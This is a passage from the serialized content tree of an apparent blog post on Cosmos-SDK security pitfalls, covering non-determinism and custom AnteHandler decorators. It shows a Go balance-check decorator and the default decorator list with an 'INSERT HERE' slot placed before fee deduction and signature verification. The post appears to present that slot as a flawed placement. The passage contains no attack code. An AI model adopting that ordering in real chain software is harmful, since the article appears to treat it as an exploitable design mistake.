CommitId",{"type":26,"tag":137,"props":80890,"children":80891},{"style":5601},[80892],{"type":32,"value":17923},{"type":26,"tag":137,"props":80894,"children":80895},{"style":5584},[80896],{"type":32,"value":8526},{"type":26,"tag":137,"props":80898,"children":80899},{"style":5601},[80900],{"type":32,"value":470},{"type":26,"tag":137,"props":80902,"children":80903},{"style":5682},[80904],{"type":32,"value":80905},"LastCommitID",{"type":26,"tag":137,"props":80907,"children":80908},{"style":5601},[80909],{"type":32,"value":6082},{"type":26,"tag":137,"props":80911,"children":80912},{"class":5559,"line":6191},[80913],{"type":26,"tag":137,"props":80914,"children":80915},{"style":5601},[80916],{"type":32,"value":70799},{"type":26,"tag":137,"props":80918,"children":80919},{"class":5559,"line":6208},[80920],{"type":26,"tag":137,"props":80921,"children":80922},{"style":5601},[80923],{"type":32,"value":5945},{"type":26,"tag":137,"props":80925,"children":80926},{"class":5559,"line":6225},[80927,80931,80935,80939,80943,80947],{"type":26,"tag":137,"props":80928,"children":80929},{"style":5610},[80930],{"type":32,"value":19582},{"type":26,"tag":137,"props":80932,"children":80933},{"style":5590},[80934],{"type":32,"value":9725},{"type":26,"tag":137,"props":80936,"children":80937},{"style":6009},[80938],{"type":32,"value":8343},{"type":26,"tag":137,"props":80940,"children":80941},{"style":5601},[80942],{"type":32,"value":470},{"type":26,"tag":137,"props":80944,"children":80945},{"style":6009},[80946],{"type":32,"value":80661},{"type":26,"tag":137,"props":80948,"children":80949},{"style":5601},[80950],{"type":32,"value":13471},{"type":26,"tag":137,"props":80952,"children":80953},{"class":5559,"line":6238},[80954,80959,80964,80969],{"type":26,"tag":137,"props":80955,"children":80956},{"style":5584},[80957],{"type":32,"value":80958},"        Version",{"type":26,"tag":137,"props":80960,"children":80961},{"style":5601},[80962],{"type":32,"value":80963},":    ",{"type":26,"tag":137,"props":80965,"children":80966},{"style":5584},[80967],{"type":32,"value":80968},"version",{"type":26,"tag":137,"props":80970,"children":80971},{"style":5601},[80972],{"type":32,"value":6099},{"type":26,"tag":137,"props":80974,"children":80975},{"class":5559,"line":6247},[80976,80981,80985,80989],{"type":26,"tag":137,"props":80977,"children":80978},{"style":5584},[80979],{"type":32,"value":80980},"        StoreInfos",{"type":26,"tag":137,"props":80982,"children":80983},{"style":5601},[80984],{"type":32,"value":17923},{"type":26,"tag":137,"props":80986,"children":80987},{"style":5584},[80988],{"type":32,"value":80830},{"type":26,"tag":137,"props":80990,"children":80991},{"style":5601},[80992],{"type":32,"value":6099},{"type":26,"tag":137,"props":80994,"children":80995},{"class":5559,"line":6270},[80996],{"type":26,"tag":137,"props":80997,"children":80998},{"style":5601},[80999],{"type":32,"value":5945},{"type":26,"tag":137,"props":81001,"children":81002},{"class":5559,"line":6279},[81003],{"type":26,"tag":137,"props":81004,"children":81005},{"style":5601},[81006],{"type":32,"value":6507},{"type":26,"tag":35,"props":81008,"children":81009},{},[81010,81012,81019,81020,81027],{"type":32,"value":81011},"Other factors contributing to determinism issues are the usage of ",{"type":26,"tag":41,"props":81013,"children":81016},{"href":81014,"rel":81015},"https://medium.com/provenanceblockchain/discovering-non-deterministic-behavior-in-provenance-blockchain-and-cosmos-sdk-3b81b87b8698",[45],[81017],{"type":32,"value":81018},"time-sensitive functions",{"type":32,"value":3339},{"type":26,"tag":41,"props":81021,"children":81024},{"href":81022,"rel":81023},"https://github.com/cosmos/cosmos-sdk/issues/16638",[45],[81025],{"type":32,"value":81026},"race conditions",{"type":32,"value":470},{"type":26,"tag":92,"props":81029,"children":81031},{"id":81030},"thou-shalt-not-passor-should-you",[81032],{"type":32,"value":81033},"Thou Shalt Not Pass...Or Should You?",{"type":26,"tag":35,"props":81035,"children":81036},{},[81037,81039,81045,81046,81052],{"type":32,"value":81038},"When developing smart contracts, it is common to delegate certain low-level tasks (such as parsing ",{"type":26,"tag":130,"props":81040,"children":81042},{"className":81041},[],[81043],{"type":32,"value":81044},"msg.value",{"type":32,"value":1108},{"type":26,"tag":130,"props":81047,"children":81049},{"className":81048},[],[81050],{"type":32,"value":81051},"msg.sender",{"type":32,"value":81053},", and collecting transaction fees) to the underlying blockchain.",{"type":26,"tag":35,"props":81055,"children":81056},{},[81057,81059,81065,81067,81073],{"type":32,"value":81058},"On Cosmos, there is no blockchain to rely on since it is the L1 itself! To simplify the development of middleware-like functionalities, ",{"type":26,"tag":130,"props":81060,"children":81062},{"className":81061},[],[81063],{"type":32,"value":81064},"Cosmos-SDK",{"type":32,"value":81066}," introduces ",{"type":26,"tag":130,"props":81068,"children":81070},{"className":81069},[],[81071],{"type":32,"value":81072},"AnteHandler",{"type":32,"value":81074}," decorators to help accomplish this. While there are pre-written decorators, all other data extraction from transactions and blockchain states must be carried out by the developers themselves.",{"type":26,"tag":35,"props":81076,"children":81077},{},[81078,81080,81085,81087,81092],{"type":32,"value":81079},"To provide context, let's first understand how an ",{"type":26,"tag":130,"props":81081,"children":81083},{"className":81082},[],[81084],{"type":32,"value":81072},{"type":32,"value":81086}," is processed. Each ",{"type":26,"tag":130,"props":81088,"children":81090},{"className":81089},[],[81091],{"type":32,"value":81072},{"type":32,"value":81093}," is a state transition function that can:",{"type":26,"tag":4820,"props":81095,"children":81096},{},[81097,81102],{"type":26,"tag":3430,"props":81098,"children":81099},{},[81100],{"type":32,"value":81101},"Transform the block state in relation to transaction and execution context.",{"type":26,"tag":3430,"props":81103,"children":81104},{},[81105,81107],{"type":32,"value":81106},"Determine the course of action for the transaction.\n",{"type":26,"tag":4820,"props":81108,"children":81109},{},[81110,81121],{"type":26,"tag":3430,"props":81111,"children":81112},{},[81113,81115,81120],{"type":32,"value":81114},"Pass the transaction to the next ",{"type":26,"tag":130,"props":81116,"children":81118},{"className":81117},[],[81119],{"type":32,"value":81072},{"type":32,"value":470},{"type":26,"tag":3430,"props":81122,"children":81123},{},[81124],{"type":32,"value":81125},"Return error for transaction.",{"type":26,"tag":35,"props":81127,"children":81128},{},[81129,81131,81136],{"type":32,"value":81130},"The bad news is that developing an ",{"type":26,"tag":130,"props":81132,"children":81134},{"className":81133},[],[81135],{"type":32,"value":81072},{"type":32,"value":81137}," is not the easiest task. For instance, let's consider a scenario where we need to ensure all signers involved in a transaction have a balance greater than X at the time of transaction execution.",{"type":26,"tag":35,"props":81139,"children":81140},{},[81141,81142,81148],{"type":32,"value":19206},{"type":26,"tag":130,"props":81143,"children":81145},{"className":81144},[],[81146],{"type":32,"value":81147},"AnteHandle",{"type":32,"value":81149}," implementation may look something like this:",{"type":26,"tag":5512,"props":81151,"children":81153},{"code":81152,"language":78767,"meta":7,"className":78768,"style":7},"const (\n    MIN_BALANCE = 100\n)\n\nfunc (abd AccountBalanceDecorator) AnteHandle(\n    ctx sdk.Context,\n    tx sdk.Tx,\n    simulate bool,\n    next sdk.AnteHandler,\n) (sdk.Context, error) {\n    sigTx, ok := tx.(authsigning.SigVerifiableTx)\n    if !ok {\n        return ctx, errorsmod.Wrap(\n            sdkerrors.ErrTxDecode,\n            \"invalid tx type\",\n        )\n    }\n\n    signers := sigTx.GetSigners()\n    for i, signer := range signers {\n        balance := abd.bk.getBalance(ctx, signer, ATOM)\n        if balance.Amount \u003C MIN_BALANCE {\n            return ctx, errorsmod.Wrap(\n                ErrInsufficientBalance,\n                \"Insufficient Balance\",\n            )\n        }\n    }\n\n    return next(ctx, tx, simulate)\n}\n",[81154],{"type":26,"tag":130,"props":81155,"children":81156},{"__ignoreMap":7},[81157,81169,81185,81192,81199,81232,81256,81281,81297,81321,81353,81401,81420,81453,81474,81486,81493,81500,81507,81537,81573,81637,81671,81703,81715,81727,81734,81741,81748,81755,81797],{"type":26,"tag":137,"props":81158,"children":81159},{"class":5559,"line":5560},[81160,81164],{"type":26,"tag":137,"props":81161,"children":81162},{"style":5573},[81163],{"type":32,"value":12244},{"type":26,"tag":137,"props":81165,"children":81166},{"style":5601},[81167],{"type":32,"value":81168}," (\n",{"type":26,"tag":137,"props":81170,"children":81171},{"class":5559,"line":5412},[81172,81177,81181],{"type":26,"tag":137,"props":81173,"children":81174},{"style":5584},[81175],{"type":32,"value":81176},"    MIN_BALANCE",{"type":26,"tag":137,"props":81178,"children":81179},{"style":5590},[81180],{"type":32,"value":5593},{"type":26,"tag":137,"props":81182,"children":81183},{"style":5626},[81184],{"type":32,"value":21935},{"type":26,"tag":137,"props":81186,"children":81187},{"class":5559,"line":5417},[81188],{"type":26,"tag":137,"props":81189,"children":81190},{"style":5601},[81191],{"type":32,"value":5742},{"type":26,"tag":137,"props":81193,"children":81194},{"class":5559,"line":5642},[81195],{"type":26,"tag":137,"props":81196,"children":81197},{"emptyLinePlaceholder":18},[81198],{"type":32,"value":6276},{"type":26,"tag":137,"props":81200,"children":81201},{"class":5559,"line":5745},[81202,81206,81210,81215,81220,81224,81228],{"type":26,"tag":137,"props":81203,"children":81204},{"style":5573},[81205],{"type":32,"value":78903},{"type":26,"tag":137,"props":81207,"children":81208},{"style":5601},[81209],{"type":32,"value":4625},{"type":26,"tag":137,"props":81211,"children":81212},{"style":5584},[81213],{"type":32,"value":81214},"abd ",{"type":26,"tag":137,"props":81216,"children":81217},{"style":6009},[81218],{"type":32,"value":81219},"AccountBalanceDecorator",{"type":26,"tag":137,"props":81221,"children":81222},{"style":5601},[81223],{"type":32,"value":5671},{"type":26,"tag":137,"props":81225,"children":81226},{"style":5682},[81227],{"type":32,"value":81147},{"type":26,"tag":137,"props":81229,"children":81230},{"style":5601},[81231],{"type":32,"value":6054},{"type":26,"tag":137,"props":81233,"children":81234},{"class":5559,"line":5850},[81235,81239,81244,81248,81252],{"type":26,"tag":137,"props":81236,"children":81237},{"style":5584},[81238],{"type":32,"value":22817},{"type":26,"tag":137,"props":81240,"children":81241},{"style":6009},[81242],{"type":32,"value":81243}," sdk",{"type":26,"tag":137,"props":81245,"children":81246},{"style":5601},[81247],{"type":32,"value":470},{"type":26,"tag":137,"props":81249,"children":81250},{"style":6009},[81251],{"type":32,"value":78952},{"type":26,"tag":137,"props":81253,"children":81254},{"style":5601},[81255],{"type":32,"value":6099},{"type":26,"tag":137,"props":81257,"children":81258},{"class":5559,"line":5878},[81259,81264,81268,81272,81277],{"type":26,"tag":137,"props":81260,"children":81261},{"style":5584},[81262],{"type":32,"value":81263},"    tx",{"type":26,"tag":137,"props":81265,"children":81266},{"style":6009},[81267],{"type":32,"value":81243},{"type":26,"tag":137,"props":81269,"children":81270},{"style":5601},[81271],{"type":32,"value":470},{"type":26,"tag":137,"props":81273,"children":81274},{"style":6009},[81275],{"type":32,"value":81276},"Tx",{"type":26,"tag":137,"props":81278,"children":81279},{"style":5601},[81280],{"type":32,"value":6099},{"type":26,"tag":137,"props":81282,"children":81283},{"class":5559,"line":5891},[81284,81289,81293],{"type":26,"tag":137,"props":81285,"children":81286},{"style":5584},[81287],{"type":32,"value":81288},"    simulate",{"type":26,"tag":137,"props":81290,"children":81291},{"style":6009},[81292],{"type":32,"value":14641},{"type":26,"tag":137,"props":81294,"children":81295},{"style":5601},[81296],{"type":32,"value":6099},{"type":26,"tag":137,"props":81298,"children":81299},{"class":5559,"line":5909},[81300,81305,81309,81313,81317],{"type":26,"tag":137,"props":81301,"children":81302},{"style":5584},[81303],{"type":32,"value":81304},"    next",{"type":26,"tag":137,"props":81306,"children":81307},{"style":6009},[81308],{"type":32,"value":81243},{"type":26,"tag":137,"props":81310,"children":81311},{"style":5601},[81312],{"type":32,"value":470},{"type":26,"tag":137,"props":81314,"children":81315},{"style":6009},[81316],{"type":32,"value":81072},{"type":26,"tag":137,"props":81318,"children":81319},{"style":5601},[81320],{"type":32,"value":6099},{"type":26,"tag":137,"props":81322,"children":81323},{"class":5559,"line":5930},[81324,81328,81333,81337,81341,81345,81349],{"type":26,"tag":137,"props":81325,"children":81326},{"style":5601},[81327],{"type":32,"value":78985},{"type":26,"tag":137,"props":81329,"children":81330},{"style":6009},[81331],{"type":32,"value":81332},"sdk",{"type":26,"tag":137,"props":81334,"children":81335},{"style":5601},[81336],{"type":32,"value":470},{"type":26,"tag":137,"props":81338,"children":81339},{"style":6009},[81340],{"type":32,"value":78952},{"type":26,"tag":137,"props":81342,"children":81343},{"style":5601},[81344],{"type":32,"value":1108},{"type":26,"tag":137,"props":81346,"children":81347},{"style":6009},[81348],{"type":32,"value":17455},{"type":26,"tag":137,"props":81350,"children":81351},{"style":5601},[81352],{"type":32,"value":17395},{"type":26,"tag":137,"props":81354,"children":81355},{"class":5559,"line":5939},[81356,81361,81365,81370,81374,81378,81383,81388,81392,81397],{"type":26,"tag":137,"props":81357,"children":81358},{"style":5584},[81359],{"type":32,"value":81360},"    sigTx",{"type":26,"tag":137,"props":81362,"children":81363},{"style":5601},[81364],{"type":32,"value":1108},{"type":26,"tag":137,"props":81366,"children":81367},{"style":5584},[81368],{"type":32,"value":81369},"ok",{"type":26,"tag":137,"props":81371,"children":81372},{"style":5590},[81373],{"type":32,"value":79019},{"type":26,"tag":137,"props":81375,"children":81376},{"style":5584},[81377],{"type":32,"value":70629},{"type":26,"tag":137,"props":81379,"children":81380},{"style":5601},[81381],{"type":32,"value":81382},".(",{"type":26,"tag":137,"props":81384,"children":81385},{"style":6009},[81386],{"type":32,"value":81387},"authsigning",{"type":26,"tag":137,"props":81389,"children":81390},{"style":5601},[81391],{"type":32,"value":470},{"type":26,"tag":137,"props":81393,"children":81394},{"style":6009},[81395],{"type":32,"value":81396},"SigVerifiableTx",{"type":26,"tag":137,"props":81398,"children":81399},{"style":5601},[81400],{"type":32,"value":5742},{"type":26,"tag":137,"props":81402,"children":81403},{"class":5559,"line":6191},[81404,81408,81412,81416],{"type":26,"tag":137,"props":81405,"children":81406},{"style":5610},[81407],{"type":32,"value":14870},{"type":26,"tag":137,"props":81409,"children":81410},{"style":5590},[81411],{"type":32,"value":15455},{"type":26,"tag":137,"props":81413,"children":81414},{"style":5584},[81415],{"type":32,"value":81369},{"type":26,"tag":137,"props":81417,"children":81418},{"style":5601},[81419],{"type":32,"value":5875},{"type":26,"tag":137,"props":81421,"children":81422},{"class":5559,"line":6208},[81423,81427,81431,81435,81440,81444,81449],{"type":26,"tag":137,"props":81424,"children":81425},{"style":5610},[81426],{"type":32,"value":18336},{"type":26,"tag":137,"props":81428,"children":81429},{"style":5584},[81430],{"type":32,"value":28435},{"type":26,"tag":137,"props":81432,"children":81433},{"style":5601},[81434],{"type":32,"value":1108},{"type":26,"tag":137,"props":81436,"children":81437},{"style":5584},[81438],{"type":32,"value":81439},"errorsmod",{"type":26,"tag":137,"props":81441,"children":81442},{"style":5601},[81443],{"type":32,"value":470},{"type":26,"tag":137,"props":81445,"children":81446},{"style":5682},[81447],{"type":32,"value":81448},"Wrap",{"type":26,"tag":137,"props":81450,"children":81451},{"style":5601},[81452],{"type":32,"value":6054},{"type":26,"tag":137,"props":81454,"children":81455},{"class":5559,"line":6225},[81456,81461,81465,81470],{"type":26,"tag":137,"props":81457,"children":81458},{"style":5584},[81459],{"type":32,"value":81460},"            sdkerrors",{"type":26,"tag":137,"props":81462,"children":81463},{"style":5601},[81464],{"type":32,"value":470},{"type":26,"tag":137,"props":81466,"children":81467},{"style":5584},[81468],{"type":32,"value":81469},"ErrTxDecode",{"type":26,"tag":137,"props":81471,"children":81472},{"style":5601},[81473],{"type":32,"value":6099},{"type":26,"tag":137,"props":81475,"children":81476},{"class":5559,"line":6238},[81477,81482],{"type":26,"tag":137,"props":81478,"children":81479},{"style":6837},[81480],{"type":32,"value":81481},"            \"invalid tx type\"",{"type":26,"tag":137,"props":81483,"children":81484},{"style":5601},[81485],{"type":32,"value":6099},{"type":26,"tag":137,"props":81487,"children":81488},{"class":5559,"line":6247},[81489],{"type":26,"tag":137,"props":81490,"children":81491},{"style":5601},[81492],{"type":32,"value":70922},{"type":26,"tag":137,"props":81494,"children":81495},{"class":5559,"line":6270},[81496],{"type":26,"tag":137,"props":81497,"children":81498},{"style":5601},[81499],{"type":32,"value":5945},{"type":26,"tag":137,"props":81501,"children":81502},{"class":5559,"line":6279},[81503],{"type":26,"tag":137,"props":81504,"children":81505},{"emptyLinePlaceholder":18},[81506],{"type":32,"value":6276},{"type":26,"tag":137,"props":81508,"children":81509},{"class":5559,"line":6288},[81510,81515,81519,81524,81528,81533],{"type":26,"tag":137,"props":81511,"children":81512},{"style":5584},[81513],{"type":32,"value":81514},"    signers",{"type":26,"tag":137,"props":81516,"children":81517},{"style":5590},[81518],{"type":32,"value":79019},{"type":26,"tag":137,"props":81520,"children":81521},{"style":5584},[81522],{"type":32,"value":81523}," sigTx",{"type":26,"tag":137,"props":81525,"children":81526},{"style":5601},[81527],{"type":32,"value":470},{"type":26,"tag":137,"props":81529,"children":81530},{"style":5682},[81531],{"type":32,"value":81532},"GetSigners",{"type":26,"tag":137,"props":81534,"children":81535},{"style":5601},[81536],{"type":32,"value":10320},{"type":26,"tag":137,"props":81538,"children":81539},{"class":5559,"line":6355},[81540,81544,81548,81552,81556,81560,81564,81569],{"type":26,"tag":137,"props":81541,"children":81542},{"style":5610},[81543],{"type":32,"value":5613},{"type":26,"tag":137,"props":81545,"children":81546},{"style":5584},[81547],{"type":32,"value":5988},{"type":26,"tag":137,"props":81549,"children":81550},{"style":5601},[81551],{"type":32,"value":1108},{"type":26,"tag":137,"props":81553,"children":81554},{"style":5584},[81555],{"type":32,"value":9730},{"type":26,"tag":137,"props":81557,"children":81558},{"style":5590},[81559],{"type":32,"value":79019},{"type":26,"tag":137,"props":81561,"children":81562},{"style":5610},[81563],{"type":32,"value":80001},{"type":26,"tag":137,"props":81565,"children":81566},{"style":5584},[81567],{"type":32,"value":81568}," signers",{"type":26,"tag":137,"props":81570,"children":81571},{"style":5601},[81572],{"type":32,"value":5875},{"type":26,"tag":137,"props":81574,"children":81575},{"class":5559,"line":6363},[81576,81581,81585,81590,81594,81599,81603,81608,81612,81616,81620,81624,81628,81633],{"type":26,"tag":137,"props":81577,"children":81578},{"style":5584},[81579],{"type":32,"value":81580},"        balance",{"type":26,"tag":137,"props":81582,"children":81583},{"style":5590},[81584],{"type":32,"value":79019},{"type":26,"tag":137,"props":81586,"children":81587},{"style":5584},[81588],{"type":32,"value":81589}," abd",{"type":26,"tag":137,"props":81591,"children":81592},{"style":5601},[81593],{"type":32,"value":470},{"type":26,"tag":137,"props":81595,"children":81596},{"style":5584},[81597],{"type":32,"value":81598},"bk",{"type":26,"tag":137,"props":81600,"children":81601},{"style":5601},[81602],{"type":32,"value":470},{"type":26,"tag":137,"props":81604,"children":81605},{"style":5682},[81606],{"type":32,"value":81607},"getBalance",{"type":26,"tag":137,"props":81609,"children":81610},{"style":5601},[81611],{"type":32,"value":165},{"type":26,"tag":137,"props":81613,"children":81614},{"style":5584},[81615],{"type":32,"value":22874},{"type":26,"tag":137,"props":81617,"children":81618},{"style":5601},[81619],{"type":32,"value":1108},{"type":26,"tag":137,"props":81621,"children":81622},{"style":5584},[81623],{"type":32,"value":9730},{"type":26,"tag":137,"props":81625,"children":81626},{"style":5601},[81627],{"type":32,"value":1108},{"type":26,"tag":137,"props":81629,"children":81630},{"style":5584},[81631],{"type":32,"value":81632},"ATOM",{"type":26,"tag":137,"props":81634,"children":81635},{"style":5601},[81636],{"type":32,"value":5742},{"type":26,"tag":137,"props":81638,"children":81639},{"class":5559,"line":6393},[81640,81644,81649,81653,81658,81662,81667],{"type":26,"tag":137,"props":81641,"children":81642},{"style":5610},[81643],{"type":32,"value":5856},{"type":26,"tag":137,"props":81645,"children":81646},{"style":5584},[81647],{"type":32,"value":81648}," balance",{"type":26,"tag":137,"props":81650,"children":81651},{"style":5601},[81652],{"type":32,"value":470},{"type":26,"tag":137,"props":81654,"children":81655},{"style":5584},[81656],{"type":32,"value":81657},"Amount",{"type":26,"tag":137,"props":81659,"children":81660},{"style":5590},[81661],{"type":32,"value":11305},{"type":26,"tag":137,"props":81663,"children":81664},{"style":5584},[81665],{"type":32,"value":81666}," MIN_BALANCE",{"type":26,"tag":137,"props":81668,"children":81669},{"style":5601},[81670],{"type":32,"value":5875},{"type":26,"tag":137,"props":81672,"children":81673},{"class":5559,"line":6401},[81674,81679,81683,81687,81691,81695,81699],{"type":26,"tag":137,"props":81675,"children":81676},{"style":5610},[81677],{"type":32,"value":81678},"            return",{"type":26,"tag":137,"props":81680,"children":81681},{"style":5584},[81682],{"type":32,"value":28435},{"type":26,"tag":137,"props":81684,"children":81685},{"style":5601},[81686],{"type":32,"value":1108},{"type":26,"tag":137,"props":81688,"children":81689},{"style":5584},[81690],{"type":32,"value":81439},{"type":26,"tag":137,"props":81692,"children":81693},{"style":5601},[81694],{"type":32,"value":470},{"type":26,"tag":137,"props":81696,"children":81697},{"style":5682},[81698],{"type":32,"value":81448},{"type":26,"tag":137,"props":81700,"children":81701},{"style":5601},[81702],{"type":32,"value":6054},{"type":26,"tag":137,"props":81704,"children":81705},{"class":5559,"line":6433},[81706,81711],{"type":26,"tag":137,"props":81707,"children":81708},{"style":5584},[81709],{"type":32,"value":81710},"                ErrInsufficientBalance",{"type":26,"tag":137,"props":81712,"children":81713},{"style":5601},[81714],{"type":32,"value":6099},{"type":26,"tag":137,"props":81716,"children":81717},{"class":5559,"line":6441},[81718,81723],{"type":26,"tag":137,"props":81719,"children":81720},{"style":6837},[81721],{"type":32,"value":81722},"                \"Insufficient Balance\"",{"type":26,"tag":137,"props":81724,"children":81725},{"style":5601},[81726],{"type":32,"value":6099},{"type":26,"tag":137,"props":81728,"children":81729},{"class":5559,"line":6501},[81730],{"type":26,"tag":137,"props":81731,"children":81732},{"style":5601},[81733],{"type":32,"value":80117},{"type":26,"tag":137,"props":81735,"children":81736},{"class":5559,"line":11634},[81737],{"type":26,"tag":137,"props":81738,"children":81739},{"style":5601},[81740],{"type":32,"value":5936},{"type":26,"tag":137,"props":81742,"children":81743},{"class":5559,"line":11652},[81744],{"type":26,"tag":137,"props":81745,"children":81746},{"style":5601},[81747],{"type":32,"value":5945},{"type":26,"tag":137,"props":81749,"children":81750},{"class":5559,"line":11697},[81751],{"type":26,"tag":137,"props":81752,"children":81753},{"emptyLinePlaceholder":18},[81754],{"type":32,"value":6276},{"type":26,"tag":137,"props":81756,"children":81757},{"class":5559,"line":11803},[81758,81762,81767,81771,81775,81779,81784,81788,81793],{"type":26,"tag":137,"props":81759,"children":81760},{"style":5610},[81761],{"type":32,"value":19582},{"type":26,"tag":137,"props":81763,"children":81764},{"style":5682},[81765],{"type":32,"value":81766}," next",{"type":26,"tag":137,"props":81768,"children":81769},{"style":5601},[81770],{"type":32,"value":165},{"type":26,"tag":137,"props":81772,"children":81773},{"style":5584},[81774],{"type":32,"value":22874},{"type":26,"tag":137,"props":81776,"children":81777},{"style":5601},[81778],{"type":32,"value":1108},{"type":26,"tag":137,"props":81780,"children":81781},{"style":5584},[81782],{"type":32,"value":81783},"tx",{"type":26,"tag":137,"props":81785,"children":81786},{"style":5601},[81787],{"type":32,"value":1108},{"type":26,"tag":137,"props":81789,"children":81790},{"style":5584},[81791],{"type":32,"value":81792},"simulate",{"type":26,"tag":137,"props":81794,"children":81795},{"style":5601},[81796],{"type":32,"value":5742},{"type":26,"tag":137,"props":81798,"children":81799},{"class":5559,"line":26089},[81800],{"type":26,"tag":137,"props":81801,"children":81802},{"style":5601},[81803],{"type":32,"value":6507},{"type":26,"tag":35,"props":81805,"children":81806},{},[81807,81809,81814,81816,81822,81824,81830],{"type":32,"value":81808},"Where should this custom ",{"type":26,"tag":130,"props":81810,"children":81812},{"className":81811},[],[81813],{"type":32,"value":81072},{"type":32,"value":81815}," be placed relative to other ",{"type":26,"tag":130,"props":81817,"children":81819},{"className":81818},[],[81820],{"type":32,"value":81821},"AnteHandlers",{"type":32,"value":81823}," provided by cosmos-sdk?\nConsidering that we are only concerned with transactions that satisfy our check, inserting it right after the ",{"type":26,"tag":130,"props":81825,"children":81827},{"className":81826},[],[81828],{"type":32,"value":81829},"SetUpContextDecorator",{"type":32,"value":81831}," should work, right?",{"type":26,"tag":35,"props":81833,"children":81834},{},[81835],{"type":26,"tag":41,"props":81836,"children":81839},{"href":81837,"rel":81838},"https://github.com/cosmos/cosmos-sdk/blob/f0aec3f30dd952e1b4b3a5b25e0412c1af5baaac/x/auth/ante/ante.go#L41",[45],[81840],{"type":32,"value":79342},{"type":26,"tag":5512,"props":81842,"children":81844},{"code":81843,"language":78767,"meta":7,"className":78768,"style":7},"anteDecorators := []sdk.AnteDecorator{\n    NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n    // INSERT HERE\n    NewExtensionOptionsDecorator(options.ExtensionOptionChecker),\n    NewValidateBasicDecorator(),\n    NewTxTimeoutHeightDecorator(),\n    NewValidateMemoDecorator(options.AccountKeeper),\n    NewConsumeGasForTxSizeDecorator(options.AccountKeeper),\n    NewDeductFeeDecorator(options.AccountKeeper, options.BankKeeper, options.FeegrantKeeper, options.TxFeeChecker),\n    NewSetPubKeyDecorator(options.AccountKeeper), // SetPubKeyDecorator must be called before all signature verification decorators\n    NewValidateSigCountDecorator(options.AccountKeeper),\n    NewSigGasConsumeDecorator(options.AccountKeeper, options.SigGasConsumer),\n    NewSigVerificationDecorator(options.AccountKeeper, options.SignModeHandler),\n    NewIncrementSequenceDecorator(options.AccountKeeper),\n}\n",[81845],{"type":26,"tag":130,"props":81846,"children":81847},{"__ignoreMap":7},[81848,81881,81898,81906,81935,81947,81959,81988,82016,82095,82128,82156,82201,82246,82274],{"type":26,"tag":137,"props":81849,"children":81850},{"class":5559,"line":5560},[81851,81856,81860,81864,81868,81872,81877],{"type":26,"tag":137,"props":81852,"children":81853},{"style":5584},[81854],{"type":32,"value":81855},"anteDecorators",{"type":26,"tag":137,"props":81857,"children":81858},{"style":5590},[81859],{"type":32,"value":79019},{"type":26,"tag":137,"props":81861,"children":81862},{"style":5601},[81863],{"type":32,"value":78830},{"type":26,"tag":137,"props":81865,"children":81866},{"style":6009},[81867],{"type":32,"value":81332},{"type":26,"tag":137,"props":81869,"children":81870},{"style":5601},[81871],{"type":32,"value":470},{"type":26,"tag":137,"props":81873,"children":81874},{"style":6009},[81875],{"type":32,"value":81876},"AnteDecorator",{"type":26,"tag":137,"props":81878,"children":81879},{"style":5601},[81880],{"type":32,"value":13471},{"type":26,"tag":137,"props":81882,"children":81883},{"class":5559,"line":5412},[81884,81889,81893],{"type":26,"tag":137,"props":81885,"children":81886},{"style":5682},[81887],{"type":32,"value":81888},"    NewSetUpContextDecorator",{"type":26,"tag":137,"props":81890,"children":81891},{"style":5601},[81892],{"type":32,"value":20968},{"type":26,"tag":137,"props":81894,"children":81895},{"style":5564},[81896],{"type":32,"value":81897},"// outermost AnteDecorator. SetUpContext must be called first\n",{"type":26,"tag":137,"props":81899,"children":81900},{"class":5559,"line":5417},[81901],{"type":26,"tag":137,"props":81902,"children":81903},{"style":5564},[81904],{"type":32,"value":81905},"    // INSERT HERE\n",{"type":26,"tag":137,"props":81907,"children":81908},{"class":5559,"line":5642},[81909,81914,81918,81922,81926,81931],{"type":26,"tag":137,"props":81910,"children":81911},{"style":5682},[81912],{"type":32,"value":81913},"    NewExtensionOptionsDecorator",{"type":26,"tag":137,"props":81915,"children":81916},{"style":5601},[81917],{"type":32,"value":165},{"type":26,"tag":137,"props":81919,"children":81920},{"style":5584},[81921],{"type":32,"value":38634},{"type":26,"tag":137,"props":81923,"children":81924},{"style":5601},[81925],{"type":32,"value":470},{"type":26,"tag":137,"props":81927,"children":81928},{"style":5584},[81929],{"type":32,"value":81930},"ExtensionOptionChecker",{"type":26,"tag":137,"props":81932,"children":81933},{"style":5601},[81934],{"type":32,"value":9320},{"type":26,"tag":137,"props":81936,"children":81937},{"class":5559,"line":5745},[81938,81943],{"type":26,"tag":137,"props":81939,"children":81940},{"style":5682},[81941],{"type":32,"value":81942},"    NewValidateBasicDecorator",{"type":26,"tag":137,"props":81944,"children":81945},{"style":5601},[81946],{"type":32,"value":6082},{"type":26,"tag":137,"props":81948,"children":81949},{"class":5559,"line":5850},[81950,81955],{"type":26,"tag":137,"props":81951,"children":81952},{"style":5682},[81953],{"type":32,"value":81954},"    NewTxTimeoutHeightDecorator",{"type":26,"tag":137,"props":81956,"children":81957},{"style":5601},[81958],{"type":32,"value":6082},{"type":26,"tag":137,"props":81960,"children":81961},{"class":5559,"line":5878},[81962,81967,81971,81975,81979,81984],{"type":26,"tag":137,"props":81963,"children":81964},{"style":5682},[81965],{"type":32,"value":81966},"    NewValidateMemoDecorator",{"type":26,"tag":137,"props":81968,"children":81969},{"style":5601},[81970],{"type":32,"value":165},{"type":26,"tag":137,"props":81972,"children":81973},{"style":5584},[81974],{"type":32,"value":38634},{"type":26,"tag":137,"props":81976,"children":81977},{"style":5601},[81978],{"type":32,"value":470},{"type":26,"tag":137,"props":81980,"children":81981},{"style":5584},[81982],{"type":32,"value":81983},"AccountKeeper",{"type":26,"tag":137,"props":81985,"children":81986},{"style":5601},[81987],{"type":32,"value":9320},{"type":26,"tag":137,"props":81989,"children":81990},{"class":5559,"line":5891},[81991,81996,82000,82004,82008,82012],{"type":26,"tag":137,"props":81992,"children":81993},{"style":5682},[81994],{"type":32,"value":81995},"    